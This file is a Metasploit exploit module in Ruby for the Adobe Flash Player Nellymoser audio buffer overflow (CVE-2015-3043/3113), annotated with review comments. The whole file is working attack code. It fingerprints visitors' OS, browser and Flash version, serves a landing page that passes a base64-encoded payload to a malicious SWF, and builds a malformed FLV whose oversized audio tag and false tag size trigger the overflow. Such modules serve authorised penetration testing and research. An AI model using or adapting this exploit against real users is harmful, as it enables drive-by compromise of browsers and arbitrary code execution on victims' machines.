GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for the Adobe Flash Player Nellymoser audio decoding
# overflow (CVE-2015-3043 / CVE-2015-3113, see 'References'). The mixin
# serves a landing page, a prebuilt SWF from the data directory and a small
# FLV container assembled in #create_flv; client gating lives entirely in the
# 'BrowserRequirements' lambdas of #initialize.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers module metadata with the framework. The 'BrowserRequirements'
  # lambdas are what the BrowserExploitServer mixin consults before a client
  # is served; the OS, user-agent and Flash version checks below are the only
  # client-side gating this module does.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
      'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References' =>
        [
          ['CVE', '2015-3043'],
          ['CVE', '2015-3113'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
          ['URL', 'http://bobao.360.cn/learning/detail/357.html']
        ],
      'Payload' =>
        {
          'DisableNops' => true
        },
      'Platform' => ['win', 'linux'],
      'Arch' => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :arch => ARCH_X86,
          # Only Linux, Windows 7 and Windows 8.1 clients pass the OS check.
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
            os =~ OperatingSystems::Match::WINDOWS_7 ||
            os =~ OperatingSystems::Match::WINDOWS_81
          end,
          # Browser gating depends on the selected target: IE or Firefox for
          # the 'Windows' target, Firefox only for the 'Linux' target. Any
          # other combination falls through to false.
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          # Flash version gating, again per target. The regexes use '^',
          # which in Ruby anchors at line start rather than string start;
          # harmless for a single-line version string, \A would be stricter.
          :flash => lambda do |ver|
            case target.name
            when 'Windows'
              # 18.x up to and including 18.0.0.161, or any 17.x except 17.0.0.169
              return true if ver =~ /^18\./ && Rex::Version.new(ver) <= Rex::Version.new('18.0.0.161')
              return true if ver =~ /^17\./ && Rex::Version.new(ver) != Rex::Version.new('17.0.0.169')
            when 'Linux'
              # 11.x up to and including 11.2.202.466, except 11.2.202.457
              return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.466') && Rex::Version.new(ver) != Rex::Version.new('11.2.202.457')
            end

            false
          end
        },
      'Targets' =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2015-06-23',
      'DefaultTarget' => 0))
  end

  # Builds both served files once, up front, then hands control to the
  # BrowserExploitServer mixin via super; #on_request_exploit below handles
  # the requests that follow.
  def exploit
    @swf = create_swf
    @flv = create_flv

    super
  end

  # Routes each client request by URI suffix: .swf and .flv are answered from
  # the in-memory files built in #exploit, anything else gets the landing
  # page produced by #exploit_template. All three responses carry no-cache
  # headers.
  #
  # @param cli [Object] client connection handed in by the mixin
  # @param request [Object] parsed HTTP request; only #uri is read here
  # @param target_info [Hash] client fingerprint, forwarded to the template
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # '$' matches at end of line; for a newline-free URI that is end of string.
    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    if request.uri =~ /\.flv$/
      print_status('Sending FLV...')
      send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Builds the landing page: an <object>/<embed> pair loading a randomly
  # named .swf, with the base64-encoded payload ('sh'), platform id ('pl')
  # and client OS name ('os') passed in through FlashVars. Returns the ERB
  # template together with the current binding so the <%= %> tags can be
  # expanded by the caller.
  #
  # @param cli [Object] client connection, used by get_payload
  # @param target_info [Hash] client fingerprint; :os_name is reflected into the page
  # @return [Array(String, Binding)] template text and the binding to evaluate it in
  def exploit_template(cli, target_info)
    # 4 to 6 random alphabetic characters; only the .swf suffix matters to on_request_exploit.
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    # NOTE(review): os_name is interpolated unescaped into attribute values
    # below; it comes from the client fingerprint, so it is the client's own
    # data being echoed back, but it is not HTML-escaped.
    os_name = target_info[:os_name]

    # platform_id stays nil if neither target name matches; both configured
    # targets ('Windows', 'Linux') do match.
    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

    return html_template, binding()
  end

  # Reads the prebuilt SWF from the framework data directory. The block form
  # of File.open closes the handle; the block's value (the inner assignment,
  # i.e. the file contents) is also what the outer swf receives.
  # NOTE(review): ::File.binread(path) would express this in a single call.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

  # Assembles a minimal FLV container in memory: the 9-byte file header, then
  # a single audio tag whose first data byte selects Nellymoser. Field names
  # in the trailing comments follow the FLV layout; the values are the
  # author's. Field sizes: header 9 bytes, tag header 11 bytes, tag data
  # 1 + 0x440 = 0x441 bytes.
  # NOTE(review): the accumulators start as '' (source-encoded, UTF-8) rather
  # than binary strings; String#b on the result would make the intent
  # explicit — confirm send_response passes the bytes through unchanged.
  #
  # @return [String] raw FLV bytes
  def create_flv
    header = ''
    header << 'FLV' # signature
    header << [1].pack('C') # version
    header << [4].pack('C') # Flags: TypeFlagsAudio
    header << [9].pack('N') # DataOffset

    data = ''
    data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
    data << "\xee" * 0x440 # SoundData

    tag1 = ''
    tag1 << [8].pack('C') # TagType (audio)
    tag1 << "\x00\x04\x41" # DataSize; 0x441 matches 1 + 0x440 bytes of data above
    tag1 << "\x00\x00\x1a" # TimeStamp
    tag1 << [0].pack('C') # TimeStampExtended
    tag1 << "\x00\x00\x00" # StreamID, always 0
    tag1 << data

    body = ''
    body << [0].pack('N') # PreviousTagSize
    body << tag1
    body << [0xeeeeeeee].pack('N') # PreviousTagSize; deliberately not the real size of tag1 (11 + 0x441 = 0x44c)

    flv = ''
    flv << header
    flv << body

    flv
  end
end